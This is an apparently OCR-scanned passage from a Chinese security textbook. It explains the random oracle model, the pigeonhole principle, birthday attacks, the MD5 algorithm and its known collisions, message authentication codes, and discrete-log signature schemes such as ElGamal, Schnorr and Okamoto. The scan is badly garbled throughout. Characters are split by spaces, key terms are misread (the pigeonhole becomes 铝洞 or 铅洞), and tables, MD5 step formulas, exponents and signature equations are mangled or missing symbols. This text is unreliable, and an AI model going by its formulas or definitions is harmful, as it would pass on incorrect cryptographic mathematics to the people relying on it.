(2) 随机 一 一 意味 着 “ 真 随机 ”, 并 不 是 计算 机 中 “计算 ”出 来 的 “ 伪 随 机 ”, 即 “均匀 分 布 ” 
或 “理想 化 ”。 但 注意 一 点 与 随机 函数 的 一 个 微小 区 别 : 如 果 问 相同 的 询问 2 次 , 预言 回答 
仍 相 同 。 

(3) 预言 一 一 可 以 认为 是 一 个 “ 黑 盒 ”工具 ,来 “模拟 ”理想 环境 。 

2. 铝 洞 原理 

为 了 理解 随机 预言 模型 ,必须 理解 蚤 洞 原 理 (Pigeonhole Principe): 如 果 ”十 1 只 钢 子 
占据 了 7 个 铅 洞 ,那么 最 少 有 一 个 铅 洞 是 被 两 只 或 两 只 以 上 的 鸽子 所 占据 。 铝 洞 原 理 的 一 
般 表 述 是 : 如 果 kn 十 1 只 铅 子 占据 个 铝 洞 ,那么 最 少 有 一 个 铝 洞 是 被 & 十 1 只 或 更 多 只 钥 
子 所 占据 。 

因为 Hash 处 理 的 整个 思想 都 规定 信息 摘要 应 当 比 信息 要 短 , 根 据 铀 洞 原 理 这 就 会 有 
冲突 , 即 有 的 摘要 要 与 多 于 一 个 的 信息 相对 应 ; 可 能 的 信息 与 可 能 的 摘要 之 间 的 关系 是 多 
对 一 的 。 

案例 : 假定 一 个 Hash 函数 当中 的 信息 长 度 是 6 比特 ,摘要 的 长 度 仅 为 4 比特。 那么 可 
能 的 摘要 数 ( 铅 洞 ) 就 是 2 一 16 ,可 能 的 信息 数 (鸽子 ) 是 2 一 64。 这 就 表明 一 16 并 且 kn 十 
1 二 64, 所 以 & 大 于 3。 结论 是 最 少 要 有 一 个 摘要 与 4 个 (k 十 1) 个 或 更 多 的 信息 相对 应 。 


4.3.3 直觉 的 错误 : 生日 攻击 


生日 攻击 方法 没有 利用 Hash 函数 的 结构 和 任何 代数 弱 性 质 , 它 只 依赖 于 消息 摘要 的 
长 度 , 即 Hash 值 的 长 度 。 这 种 攻击 对 Hash 函数 提出 了 一 个 必要 的 安全 条 件 , 即 消息 摘要 
必须 足够 长 。 生 日 攻击 这 个 术语 来 自 于 所 谓 的 生日 问题 (Birthday Problem): 生日 问题 是 
指 , 如 果 一 个 房间 里 有 23 个 或 23 个 以 上 的 人 ,那么 至 少 有 两 个 人 的 生日 相同 的 概率 要 大 于 
50%。 这 就 意味 着 在 一 个 典型 的 标准 小 学 班级 (30 人 ) 中 ,存在 两 人 生日 相同 的 可 能 性 更 
高 。 对 于 60 或 者 更 多 的 人 ,这 种 概率 要 大 于 99%。 从 引起 逻辑 矛盾 的 角度 来 说 生日 悖 论 
并 不 是 一 种 悖 论 ,从 这 个 数学 事实 与 一 般 直 觉 相 抵触 的 意义 上 , 它 才 称 得 上 是 一 个 悖 论 。 大 
多 数 人 会 认为 ,23 人 中 有 2 人 生日 相同 的 概率 应 该 远 远 小 于 50%。 

一 般 化 的 4 个 生日 问题 如 下 。 

问题 1: 一 个 班级 中 最 少 的 学 生 数 k 是 多 少 , 才 能 使 得 很 可 能 最 少 有 一 个 学 生 要 在 预先 
确定 的 那 一 天 过 生日 ? 

问题 2: 一 个 班级 中 学 生 的 最 小 数 k 是 多 少 , 才 能 使 得 很 可 能 最 少 有 一 个 学 生 和 教授 选 
出 来 的 另 一 个 学 生 在 同一 天 过 生日 ? 

问题 3: 一 个 班级 中 学 生 的 最 小 数 k 是 多 少 , 才 能 使 得 很 可 能 最 少 有 两 个 学 生 在 同一 天 
过 和 坐 则 ? 

问题 4: 有 两 个 班 ,每 一 个 班 中 有 名 学 生 。 & 的 最 小 值 是 多 少 ,才能 使 得 很 可 能 第 一 


班 中 最 少 有 一 名 学 生 和 第 二 班 中 的 一 名 学 生 在 同一 天 过 生日 ? 
表 4.9 给 出 了 4 种 生日 问题 中 每 个 样本 的 概率 (P) 和 样本 大 小 (k) 的 表达 式 。 
表 4.9 4 种 生日 问题 解答 概要 
问题 概 率 & 的 一 般 值 P=1/2 时 ,k 的 值 学生 数 (N=365) 


1 Pasl=e WR Asz*ln[1/(1 一 P)]XN ke0.69XN 253 
2 ole tn Asz*ln[1/(1 一 P)]XN 十 1 Asz0.69X N+1 254 
3 Pa1—e-*/2N ke [2In(1/(1—P)J XN kx1. 18X NY? 23 
4 Psz1 一 ee ke [ln(1/(1—P)))J XN ka0. 83X NI 16 


4.3.4 实例: MD5 


MD5 的 全 称 是 Message-Digest Algorithm 5, 在 20 世纪 90 年 代 初 由 MIT 的 计算 机 科 
学 实验 室 和 RSA Data Security Inc 发 明 , 经 MD2、MD3 和 MD4 发 展 而 来 。 此 算法 将 对 输 
入 的 任意 有 限 长 度 的 信息 进行 计算 ,产生 一 个 128 位 长 度 的 “指纹 ”或 “ 报 文摘 要 ”。 近 年 来 ， 
MD5 被 人 们 发 现存 在 越 来 越 多 的 安全 隐患 9 ,最 为 广泛 使 用 的 安全 Hash 函数 MD5 不 再 像 
以 前 那么 流行 。 

MD5 算法 每 步 运算 由 整数 模 22 加 法 ` 布 尔 函数 (4 个 不 同 的 布尔 函数 ) 和 左 循环 移 位 组 
成 。 一 次 压缩 函数 运算 总 共 64 步 , 它 把 每 个 消息 块 (512 比特 ) 和 前 一 次 压缩 函数 运算 的 
128 位 输出 结果 作为 压缩 函数 新 的 输入 值 运算 出 更 新 的 128 位 输出 结果 ,通过 多 次 迭代 运 
算 最 后 得 出 MD5 报 文摘 要 值 。 

MD5 算法 的 具体 描述 如 下 。 

1. 准备 

在 MD5 算法 中 ,首先 需要 对 信息 进行 填充 ,使 其 位 长 对 512 求 余 的 结果 等 于 448。 因 
此 ,信息 的 位 长 将 被 扩展 至 NX512 十 448, 即 NX64 十 56 个 字 节 ,NN 为 一 个 正 整 数 。 填 充 的 
方法 如 下 : 在 信息 的 后 面 填充 一 个 1 和 无 数 个 0, 直到 满足 上 面 的 条 件 时 才 停止 用 0 对 信息 
的 填充 。 然 后 ,在 这 个 结果 后 面 附加 一 个 以 64 位 二 进 制 表 示 的 填充 前 信息 长 度 , 当 原 消息 
长 度 大 于 2% 时 ,用 消息 长 度 mod 2% 填 充 , 如 图 4.14 所 示 。 
中 LX 512bit=N x 32bit We 

消息 K 位 | 填充 位 1000.0 | 长 度 K mod 2% 


图 4.14 MD5 填充 


经 过 这 两 步 的 处 理 , 现 在 的 信息 的 位 长 = 二 NX512 十 448 十 64 二 CN 十 1) X512, 即 长 度 恰 
好 是 512 的 整数 倍 。 这 样 做 的 原因 是 为 满足 后 面 处 理 中 对 信息 长 度 的 要 求 。 

2. 算法 

整体 : 如 图 4.15 所 示 ,Yo~Yi_1 是 个 512 位 分 组 ,经 过 准备 工作 处 理 的 消息 正好 是 


中 ”2004 年 的 国际 密码 年 会 上 ,王小云 等 给 出 MD5-Hash 函数 的 直接 碰撞 攻击 并 找到 了 碰撞 实例 ,2007 年 , Marc 
Stevens 等 人 指出 通过 伪造 软件 签名 ,可 重复 性 攻击 MD5 算法 ,2008 年 ,荷兰 埃 因 霍 芬 技 术 大 学 科学 家 成 功 把 2 个 可 执 
行文 件 进行 了 MDs5 碰撞 ,使 得 这 两 个 运行 结果 不 同 的 程序 被 计算 出 同一 个 MD5。 
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512 的 整数 倍 。 再 短 的 消息 也 至 少 经 过 一 个 MD5 的 处 理 而 输出 128 位 的 摘要 。Cw, 表 示 一 
个 数据 缓冲 区 ,是 上 一 个 MD5 输出 的 128 位 摘要 。 


ho hn 了 Yi 


512 512 所 


vi MDsj MD5)] … 2 {MDs) 
Cu 


寄存 器 Coy Co 


128 


图 4.15 MD5 整体 流程 


细节 : MD5 共 执 行 4 轮 ,每 一 轮 有 16 步 , 共 64 步 ,每 一 步 的 执行 过 程 如 图 4. 16 所 示 。 


a 
b 
c 

L4 | 


M || nD 


4.16 ”MD5 细节 流程 : 某 一 步 的 执行 过 程 


(1) 初始 的 128 位 摘要 值 被 规定 为 (存储 时 低 字 节 在 前 little-endian): 

a=01 23 45 67 (0x67452301),6=89 AB CD EF (0xefcdab89) 

c=FE DC BA 98 (0x98badcfe),d=76 54 32 10 (0x10325476) 

awb.cvd 是 4 个 寄存 器 ,每 个 32 位 ,在 计算 过 程 中 4 个 寄存 器 的 值 不 断 发 生变 化 。 

(2) 每 一 步 的 迭代 公式 : 

a=d 

5 二 6 十 ((a 十 布尔 函数 (5, c,d) 十 Mj 十 T[i] ) 二 <<= K) 

c=b 

d=¢ 

(3) 在 每 一 轮 中 ,布尔 函数 (5, c,d) 是 一 个 不 同 的 非 线 性 函数 ,分 别 对 应 4 个 函数 之 
一 ,并 且 对 应 的 左 循环 移 位 数 也 各 不 相同 (“二 二 二 K” 代 表 左 循环 移 位 K 个 位 置 ), 符 号 
(人 、V 、 一 .四 ) 表 示 逻 辑 操作 (AND、OR、NOT、XOR): 

1 一 16 步 (第 一 轮 ) 采 用 的 布尔 函数 为 F(zr,y,z) 二 (zx 人 y) V (工人 >), 左 循环 移 
位 的 位 数 分 别 为 7,12,17 和 22 并 循环 使 用 4 次。 

17 一 32 步 (第 二 轮 ) 采 用 的 布尔 函数 为 G (z,y,z)=(z 人 zx) V (y 人 一 z), 左 循环 移 
位 的 位 数 分 别 为 5.9、14 和 20 并 循环 使 用 4 次 。 

33 一 48 步 ( 第 三 轮 ) 采 用 的 布尔 函数 为 及 (z,y,z) 二 + 也 y 中 z, 左 循环 移 位 的 位 数 分 别 
为 4、11、16 和 23 并 循环 使 用 4 次 。 

49 一 64 步 (第 四 轮 ) 采 用 的 布尔 函数 为 T (zy'=)=y(Cz V ”=), 左 循环 移 位 的 位 数 
分 别 为 6.10.15 和 21 并 循环 使 用 4 次 。 

(4) Mi 表示 当前 正在 处 理 的 512 比特 分 组 Y, 的 第 j 个 32 比特 字 ,正好 每 轮 16 次 ,重复 


4 轮 。 
(5) 对 于 T(G) ,四 轮 的 操作 类 似 ,每 轮 16 次 : 用 到 一 个 有 64 个 元 素 的 表 TL1.. 64]， 
T(GD) 是 2”Xabs(sin( 让 ) 的 整数 部 分 ,i 的 单位 是 弧度 ,例如 (1) 二 361409360, 其 十 六 进 制 
为 T(1)==0xd76aa478, 其 二 进 制 是 11010111011010101010010001111000 ,正好 32 位 ,可 以 
进行 模 22 加 法 运算 。 

3. 输出 

由 a.b、c.d 4 个 寄存 器 的 输出 按 低 位 字 节 在 前 的 顺序 ( 即 以 a 的 低 字 节 开始 、d 的 高 字 
节 结 束 ) 得 到 128 位 的 消息 摘要 。 

MD5 安全 性 简 析 : 

2004 年 8 月 17 日 的 美国 加 州 圣 巴 巴 拉 , 正 在 召开 的 国际 密码 学 会 议 (Crypto”2004) 安 
排 了 3 场 关于 杂凑 函数 的 特别 报告 。 在 国际 著名 密码 学 家 Eli Biham 和 Antoine Joux 相继 
做 了 对 SHA-1 的 分 析 与 给 出 SHA-0 的 一 个 碰撞 之 后 ,来 自 山东 大 学 的 王小云 教授 做 了 破 
译 MD5 .HAVAL-128、MD4 和 RIPEMD 算法 的 报告 。 王 小 云 等 的 工作 意义 主要 有 4 点: 

(1) 不 是 破译 ,而 是 碰撞 ,类 似 生日 攻击 的 一 种 方法 (但 概率 大 得 多 ) ,与 真正 的 破译 是 
有 区 别 的 ,当然 能 够 快速 找到 碰撞 ,实际 上 也 能 达到 破译 的 效果 ,但 想 伪 造 仍然 是 很 难 的 。 

(2) 意味 黑客 可 能 在 数 小 时 之 内 用 标准 个 人 计算 机 产生 出 杂凑 冲撞 ,但 要 编写 特定 的 
后 门 程序 ,再 覆 以 相同 的 杂凑 冲撞 , 则 可 能 更 费时 。 

(3) 于 1994 年 替代 SHA-0 成 为 联邦 信息 处 理 标准 的 SHA-1 的 减弱 条 件 的 变种 算法 
能 够 被 破解 ; 但 完整 的 SHA-1 并 没有 被 破解 ,也 没有 找到 SHA-1 的 碰撞 。 

(4) 研究 结果 说 明 SHA-1 的 安全 性 暂时 没有 问题 ,但 随 着 技术 的 发 展 , 技 术 与 标准 局 
计划 在 2010 年 之 前 逐步 淘汰 SHA-1, 换 用 其 他 更 长 更 安全 的 算法 (如 SHA-224、SHA-256、 
SHA-384 和 SHA-512) 来 替代 。 


4.4 消息 认证 与 消息 认证 码 


消息 认证 是 指 通过 对 消息 或 消息 相关 信息 进行 加 密 或 签名 变换 进行 的 认证 ,目的 是 为 
防止 传输 和 存储 的 消息 被 有 意 或 无 意 地 算 改 ,包括 消息 内 容 认 证 ( 即 消 息 完整 性 认证 ) ,消息 
的 源 和 宿 认 证 ( 即 身份 认证 ) 及 消息 的 序号 和 操作 时 间 认 证 等 。 消息 认证 所 用 的 摘要 算法 与 
一 般 的 对 称 或 非 对 称 加 密 算法 不 同 , 它 并 不 用 于 防止 信息 被 窃取 ,而 是 用 于 证 明 原 文 的 完整 
性 和 准确 性 。 也 就 是 说 ,消息 认证 主要 用 于 防止 信息 被 算 改 。 

1. 消息 内 容 认 证 

消息 内 容 认证 常用 的 方法 是 : 消息 发 送 者 在 消息 中 加 入 一 个 鉴别 码 ( 消 息 认证 码 
MAC. 自 改 检测 码 MDC 等 ) 并 经 加 密 后 发 送 给 接收 者 (有 时 只 需 加 密 鉴别 码 即 可 )。 接 收 
者 利用 约定 的 算法 对 解密 后 的 消息 进行 鉴别 运算 ,将 得 到 的 鉴别 码 与 收 到 的 鉴别 码 进行 比 
较 , 若 二 者 相等 , 则 接收 ,否则 拒绝 接收 。 

2. 源 和 宿 的 认证 

一 种 方法 是 通信 双方 事先 约定 发 送 消息 的 数据 加 密 密 钥 ,接收 者 只 需 证 实 发 送 来 的 消 
息 是 否 能 用 该 密 钥 还 原 成 明文 就 能 鉴定 发 送 者 。 如 果 双 方 使 用 同一 个 数据 加 密 密 钥 ,那么 
只 需 在 消息 中 说 入 发 送 者 的 识别 符 即 可 。 另 一 种 方法 是 通信 双方 事先 约定 各 自发 送 消息 所 
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使 用 的 通行 字 , 发 送 消息 中 含有 此 通行 字 并 进行 加 密 ,接收 者 只 需 判别 消息 中 解密 的 通行 字 
是 否 等 于 约定 的 通行 字 就 能 鉴定 发 送 者 。 为 安全 起 见 , 通 行 字 应 该 是 可 变 的 。 

3. 消息 序号 和 操作 时 间 的 认证 

消息 的 序号 和 时 间 性 的 认证 主要 是 阻止 消息 的 重 放 攻击 。 常 用 的 方法 有 : 消息 的 流水 
作业 号 .链接 认证 符 , 随 机 数 认证 法 和 时 戳 等 。 

4. 消息 认证 码 (Message Authentication Code) 

与 密 钥 相 关 的 单 向 散 列 函 数 通常 称 为 消息 认证 码 ,表示 为 MAC 二 Ck (M), 如 图 4.17 
所 示 。 其 中 : M 为 可 变 长 的 消息 ; K 为 通信 双方 共享 的 密 钥 ; C 为 单 向 函数 。 


A( 源 ) B( 目 的 ) 
| 
M| k M 区 M t 六 i 
MAC| ~ MAC Mad| 


图 4.17 消息 认证 码 


用 途 : 为 拥有 共享 密 钥 的 双方 在 通信 中 验证 消息 的 完整 性 ,或 被 单个 用 户 用 来 验证 他 
的 文件 是 否 被 改动 。 
MAC 的 数学 定义 为 (MAC) [= (参数 生成 算法 ,认证 算法 ,验证 算法 ), 由 3 个 算法 
组 成 。 
。 参数 生成 算法 (KGen): 这 是 一 个 概率 多 项 式 时 间 算 法 ,输入 安全 参数 了 ,输出 私 
钥 开 。 
。 认证 算法 : 输入 私 钥 氏 和 消息 m E10,1)" ,算法 (可 能 是 概率 地 ) 输 出 一 个 认证 标签 
Tag。 通 常 记 Tag 一 MAC(m)。 
。 验证 算法 : 输入 私 钥 ,消息 m 和 它 的 标签 Tag, 算 法 (确定 性 地 ) 输 出 1, 如 果 Tag 
是 合法 的 ; 否则 输出 0。 
称 一 个 消息 认证 码 是 选择 消息 攻击 存在 性 不 可 伪造 的 EU-CMA) ,如 果 对 于 任何 概率 
多 项 式 时 间 敌 手 , 它 可 以 调用 认证 预言 机 MAC:(。) ,敌手 输出 一 对 仿造 标签 使 得 
MACi(m) 二 1 的 概率 Succ8-"(k) 是 可 忽略 的 。 
MAC 有 如 下 3 种 基本 用 法 。 
。 消息 认证 : A 一 B:M | Ck (MD ,提供 认证 ,只 有 A 和 B 共享 K。 
。 消息 认证 和 机 密 性 ,认证 对 明文 的 实现 : A 习 B:Ex, [LM | Cu (M)]。 提 供认 证 ; 只 
有 A 和 B 共享 K,。 提 供 机密 性 : 只 有 A 和 B 共享 K,。 
消息 认证 和 机 密 性 ,认证 对 密 文 的 实现 : A 一 B: Ex, [LM] | Cn (Ex, [LMJ)。 提 供认 
证 : 采用 KK 。 提 供 机 密 性 : 采用 K,。 
5. 消息 认证 与 数字 签名 
从 某 种 意义 上 说 ,消息 认证 类 似 于 数字 签名 。 二 者 的 不 同 之 处 在 于 消息 认证 系统 不 要 
求 第 三 方 (可 能 是 不 诚实 的 ?验证 由 指定 用 户 生 成 的 认证 标签 的 有 效 性 ,而 数字 签名 系统 要 
求 第 三 方 可 以 校 验 其 他 用 户 生成 的 签名 的 有 效 性 。 因 此 ,数字 签名 为 消息 认证 问题 提供 了 


一 种 解决 方案 。 另 一 方面 ,消息 认证 机 制 并 不 一 定 会 构成 数字 签名 机 制 。 
4.5 数字 签名 


4.5.1 数字 签名 基本 概念 


在 文件 上 手写 签名 长 期 以 来 被 用 作 作者 身份 的 证 明 , 或 至 少 同意 文件 的 内 容 。 在 计算 
机 上 ,可 以 用 数字 签名 (Digital Signature) 来 实现 与 文件 上 手写 签名 相同 的 功能 。 所 谓 数字 
签名 ,就 是 只 有 信息 发 送 者 才能 产生 的 别人 无 法 伪造 的 一 段 数 字 串 ,这 段 数字 串 同 时 也 是 对 
发 送 者 发 送信 息 真实 性 一 个 证 明 。 数 字 签名 也 称 为 电子 签名 ,是 公 钥 密码 系统 的 一 种 重要 
应 用 方式 。 现 在 ,已 经 有 很 多 国家 制定 了 电子 签名 法 。《 中 华人 民 共 和 国电 子 签 名 法 ) 已 于 
2004 年 8 月 28 日 第 十 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 一 次 会 议 通过 ,并 已 于 2005 年 
4 月 1 日 开始 实施 。 

数字 签名 在 ISO7498 一 2 标准 中 定义 为 :“ 附 加 在 数据 单元 上 的 一 些 数据 ,或 是 对 数据 
单元 所 作 的 密码 变换 ,这 种 数据 和 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 和 数 
据 单 元 的 完整 性 ,并 保护 数据 ,防止 被 人 (例如 接收 者 ) 进 行 伪造 "。 美 国电 子 签名 标准 
(DSS,FIPS186 一 2) 对 数字 签名 作 了 如 下 解释 :“ 利 用 一 套 规 则 和 一 个 参数 对 数据 计算 所 得 
的 结果 ,用 此 结果 能 够 确认 签名 者 的 身份 和 数据 的 完整 性 ”。 

1. 数字 签名 的 特点 

作为 一 种 签名 方式 ,数字 签名 与 书面 文件 上 的 手写 签名 有 着 共同 的 特征 和 作用 。 

(1) 签名 是 可 信 的 : 如 果 接 收 者 能 够 用 签名 者 的 公开 密 钥 解密 ,他 就 能 够 确定 签名 者 
的 身份 。 

(2) 签名 不 可 伪造 : 只 有 签名 者 知道 他 的 私人 密 钥 ,别人 无 法 伪造 他 的 签名 。 

(3) 签名 不 可 重用 : 签名 是 文件 的 一 部 分 ,不 法 之 徒 不 可 能 将 签名 移 到 另 一 个 文件 上 。 

(4) 被 签名 的 文件 是 不 可 改变 的 : 如 果 被 签名 的 文件 有 任何 改变 ,那么 该 签名 文件 就 
不 可 能 用 签名 者 的 公开 密 钥 进行 解密 。 
(5) 签名 是 不 可 抵赖 的 : 因为 别人 不 知道 签名 者 的 私人 密 钥 , 不 可 能 产生 同样 的 签名 
文件 ,因此 签名 是 不 可 能 抵赖 的 。 

手写 签名 与 数字 签名 的 主要 区 别 在 于 : 

(1) 体现 形式 不 一 样 。 手 写 签 名 印 在 文件 的 物理 部 分 ,手写 签名 反映 某 个 人 的 个 性 特 
征 , 同 一 个 人 对 不 同文 档 的 手写 签名 体现 的 个 性 特征 相同 ; 数字 签名 则 以 签名 算法 体现 在 
所 签 的 文件 中 。 数 字 签 名 是 数字 串 , 它 随 被 签 对 象 不 同 而 变化 。 同 一 个 人 对 不 同文 档 的 数 
字 签 名 是 不 同 的 。 

(2) 验证 方式 不 同 。 一 个 手写 签名 是 通过 和 一 个 真实 的 手写 签名 相 比 较 来 验证 ; 而 数 
字 签 名 能 通过 一 个 公开 的 验证 算法 来 验证 。 任 何人 都 可 以 验证 一 个 数字 签名 。 

(3) 复制 形式 不 同 。 手 写 签名 不 易 复 制 ; 数字 签名 容易 复制 。 

2. 数字 签名 原理 

目前 ,数字 签名 是 建立 在 公开 密 钥 体制 基础 上 的 , 现 有 的 多 种 数字 签名 算法 都 是 公开 密 
钥 算 法 ,用 秘密 消息 对 文件 签名 ,用 公开 消息 去 验证 ,是 公开 密 钥 加 密 技术 的 男 一 类 应 用 。 
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在 实际 的 实现 过 程 中 ,采用 公开 密 钥 密码 算法 对 长 文件 Ay 和 角 A 


签名 效率 太 低 , 为 了 节约 时 间 , 数 字 签 名 协议 经 常 和 单 。 ”、、~ ~ 

向 散 列 函 数 一 起 使 用 。 现 在 以 图 4. 18 说 明 数字 签名 方 起 钟 | | 机 
案 的 原理 ; 如 果 A 要 向 B 发 送 一 个 消息 ,尽管 该 消息 本 ” ”| 下 | 全 坑 的 十 交 | 如 | “| 种 
身 的 保密 性 可 能 并 不 重要 ,但 A 希望 B 能 够 确认 该 消息 

确实 是 A 发 出 的 ,并 且 消 息 在 传输 过 程 中 没有 被 改 动 ， 图 4.18 数字 签名 原理 


即 要 实现 消息 真实 来 源 的 验证 和 消息 的 完整 性 验证 。 
在 这 种 情况 下 A 使 用 自己 的 私人 密 钥 来 加 密 消息 。 如 果 B 收 到 A 的 密 文 消息 后 ,能够 
用 A 的 公开 密 钥 进行 解密 ,这 样 就 验证 了 该 消息 一 定 是 由 A 发 出 的 。 因 为 除了 A 以 外 , 没 
有 其 他 人 能 够 创建 出 可 以 用 A 的 公开 密 钥 来 解密 的 密 文 来 。 并 且 因 为 如 果 没 有 A 的 私人 
密 钥 就 不 可 能 对 消息 进行 改动 ,因此 在 消息 的 真实 来 源 得 以 验证 的 同时 ,消息 的 数据 完整 性 
也 能 够 得 到 验证 。 数 字 签 名 是 不 可 抵赖 的 。 即 使 A 以 后 声称 他 没有 发 送 这 个 消息 给 B, 但 
由 于 除了 A 以 外 ,没有 人 能 够 生成 同样 的 密 文 ,这 就 说 明 A 在 说 谎 。 
3. 数字 签名 体制 
一 个 数字 签名 体制 之 : = (参数 生成 算法 ,签名 算法 ,验证 算法 ) 由 3 个 算法 组 成 
。 参数 生成 算法 (KGen) : 这 是 一 个 概率 多 项 式 时 间 算 法 ,输入 安全 参数 1* ,输出 私 钥 
sk 和 公 钥 pk。 
。 签名 算法 (Sig): 输入 私 钥 sk 和 消息 mmE {0,1)" ,算法 (可 能 是 概率 地 ) 输 出 一 个 签 
名 6。 
。 验证 算法 (Verify) : 输入 公 钥 pk、 消 息 m 和 它 的 签名 9 ,算法 (确定 性 地 ) 输 出 1, 如 
果 签 名 是 合法 的 ; 否则 输出 0。 
称 一 个 签名 是 选择 消息 攻击 存在 性 不 可 伪造 的 (EU-CMA) ,如 果 对 于 任何 概率 多 项 式 
时 间 敌 手 ,可 以 调用 签名 预言 机 6=Sigs(，) , 它 输出 一 对 仿造 签名 使 得 验证 算法 Verifyw 
(22,0) 一 1 的 概率 Succ (kk) 是 可 忽略 的 。 


4.5.2 基于 素数 域 上 离散 对 数 问 题 的 数字 签名 方案 


基于 素数 域 上 离散 对 数 问题 的 数字 签名 方案 是 一 类 常用 的 数字 签名 方案 ,其 中 包括 著 
名 的 ElGamal 签名 方案 、DSA 签名 方案 ,Okmaoto 签名 方案 以 及 可 以 概括 许多 签名 方案 的 
离散 对 数 签名 方案 等 。 

素数 域 的 乘法 群 上 的 离散 对 数 问题 公共 参数 如 下 : 

设 p 是 一 个 素数 ,g 是 2; 的 一 个 生成 元 。 已 知 整数 <, 求 整数 0, 使 得 等 式 g* 二 a(mod 
力 ) 成 立 。 

1. ElGamal 签名 方案 

1) 方案 参数 

Pp: 大 素数 。 

: 等 于 p 一 1 或 p 的 大 素 因子 。 

: 8 是 Zi 的 一 个 g 阶 元 素 。 

: 用 户 A 的 秘密 密 钥 ,rERZ; 。 

: 用 户 A 的 公开 密 钥 ,y= 二 g”(mod p)。 


已 ”是 中 全 


2) 数字 签名 的 生成 过 程 
对 于 待 签 名 的 消息 mw, 用 户 A 进行 以 下 步骤 : 


& 


1) 计算 m 的 杂凑 值 H Gm)。 


(2) 选择 随机 数 &: kE Zi ,计算 出 ”一生 (mod p)。 
(3) 计算 出 * 王 (五 (xz) 一 zr)R -ICmod p 一 1)。 
以 (r,s) 作 为 生成 的 数字 签名 。 


3 


) 签名 验证 过 程 


数字 签名 的 收 方 在 收 到 消息 mx 和 数字 签名 (r,s) 后 , 先 计算 及 (mm) ,并 按 下 式 验证 


Ver(y, (r,s) ,HOm)) = True—> yr’ = g"™ (mod p) 


这 个 签名 方案 的 正确 性 可 以 由 以 下 等 式 证 明 : 


rs = ogniogk = orrtHn)-—re 


yr' 三 g"g “三 g = g"™ (mod p) 


2. Schnorr 签名 方案 


1 
p 


8: 
-: 用 户 A 的 秘密 密 钥 ,1 二 x 二 gq。 


~ 
2 


) 方案 参数 

: 大 素数 ,p 宇 2 。 

: 大 素数 ,gq|(p 一 1) ,gq 宇 2'% 。 
gERrZ;? ,HH g’=1(mod p), 


: 用 户 A 的 公开 密 钥 ,y 二 g* (mod p)。 
) 数字 签名 的 生成 过 程 


对 于 待 签名 的 消息 mw, 用 户 A 进行 以 下 步骤 : 


( 


1) 计算 随机 数 &:1 二 k 二 gq, 计 算 : r=g*(mod p)。 


(2) 计算 : e=H(r,m)。 
(3) 计算 出 s=ze 十 k(mod gq)。 
以 (e,s) 作 为 生成 的 数字 签名 。 


3 


) 签名 验证 过 程 


数字 签名 的 收 方 在 收 到 消息 m 和 数字 签名 (e,s) 后 , 先 计 算 ”一 sy 一 (mod p), 然 后 计 


算 H( 


二 ,72) 并 按 下 式 验证 : 


Ver(y,(e»,s) sm) = True=—>H(r’,m) 一 e 


这 个 签名 方案 的 正确 性 可 以 由 以 下 等 式 证 明 : 


r=gy"*=g =gt=r(mod p) 
Schnorr 签名 方案 的 安全 性 基于 随机 预言 模型 。 
3. Harn 签名 方案 
1) 方案 参数 
p: 大 素数 。 
d: p 一 1 大 素数 因子 。 
8: 8 是 Zi 的 一 个 g 阶 元 素 。 


六 


Ee 


: 用 户 A 的 秘密 密 钥 ,TE RZ 。 
: 用 户 A 的 公开 密 钥 ,y= 二 g*(mod p)。 


计算 密码 


山名 


秦 于 案例 的 网 络 安全 技术 与 实践 


2) 数字 签名 的 生成 过 程 

对 于 待 签名 的 消息 mr, 用 户 A 进行 以 下 步骤 : 

(1) 计算 m 的 杂凑 值 H Gm)。 

(2) 选择 随机 数 上 : kEZ; ,计算 出 r= 二 g*(mod p)。 
(3) 计算 出 s=zx(H(m) 十 站) 一 k mod gq。 


以 (r,s) 作 为 生成 的 数字 签名 。 

3) 签名 验证 过 程 

数字 签名 的 收 方 在 收 到 消息 mx 和 数字 签名 (r,s) 后 , 先 计算 五 (”) ,并 按 下 式 验 证 : 
ytr =rg’modp 


本 方案 与 EIGamal 方案 相 比 ,具有 以 下 优点 : 简化 签名 过 程 ,加 快 签名 的 验证 速度 ; 具 
有 “宽带 ” 闷 下 信道 ,允许 任意 的 秘密 信息 隐藏 在 签名 中 ; 模 可 为 任意 素数 ; 能 够 高 效 地 实 
现 多 重 签名 。 

4. Okamoto 签名 方案 

1) 方案 参数 

Pp: 大 素数 ,p 宇 2 。 

gq: 大 素数 ,gq|(p 一 1) ,gq 宇 2 。 

gilyg2: 两 个 与 gq 同 长 的 随机 数 。 

ziyzs: 用 户 A 的 秘密 密 钥 ,两 个 小 于 gq 的 随机 数 。 

y: 用 户 A 的 公开 密 钥 ,y= 二 gi "gz* (mod p)。 

2) 数字 签名 的 生成 过 程 

对 于 待 签名 的 消息 m,A 进行 以 下 步骤 : 

(1) 选择 两 个 小 于 g 的 随机 数 ki ,ks€ RZ2 。 

(2) 计算 出 杂凑 值 : e==H(ghi gz (mod p),m)。 

(3) 计算 出 一 (十 ezi)(Cmod gq)。 

(4) 计算 出 ss= (ks 十 exs)(mod g) 。 

以 (Ce,s1,ss) 作 为 对 m 生成 的 数字 签名 。 

3) 签名 验证 过 程 

数字 签名 的 收 方 在 收 到 消息 m 和 数字 签名 (e,si ,ss) 后 ,进行 以 下 步骤 来 验证 签名 的 有 
效 性 : 

(1) 计算 v= gh gzy'(mod p)。 

(2) 计算 出 e = 二 HCv,m)。 

(3) 验证 : Ver(y,(e,si,52),m) 二 True 寺 >e’ 二 e。 

这 个 签名 方案 的 正确 性 可 以 通过 以 下 等 式 证 明 : 

v= gig2y (mod p) = gg 和 Ts gi ga™ (mod p) = ghig$ (mod p) 

5. Neber-Rueppel 消息 恢复 签名 方案 

此 方案 是 一 个 消息 恢复 数字 签名 方案 : 验证 人 可 以 从 签名 中 恢复 出 原始 消息 ,使 得 签 
名 人 不 需要 将 被 签名 的 消息 发 送 给 验证 人 。 

1) 方案 参数 

pb: 大 素数 。 


gq: 大 素数 ,gl (p 一 1)。 
g: gERZ; ,HB gl1(mod p)。 
工 : 用 户 A 的 秘密 密 钥 ,xE Zi 。 
y: 用 户 A 的 公开 密 钥 ,y= 二 g*(mod p)。 
2) 数字 签名 的 生成 过 程 
对 于 待 签名 的 消息 m,A 进行 以 下 步骤 : 
(1) 计算 出 区 二 RGm) ,其 中 RR 是 一 个 单一 映射 ,并 且 容 易 求 逆 , 称 为 元 余 函 数 。 
(2) 选择 一 个 随机 数 (0 二 kgq) ,计算 出 r=g “mod p。 
(3) 计算 出 e=mr(mod g)。 
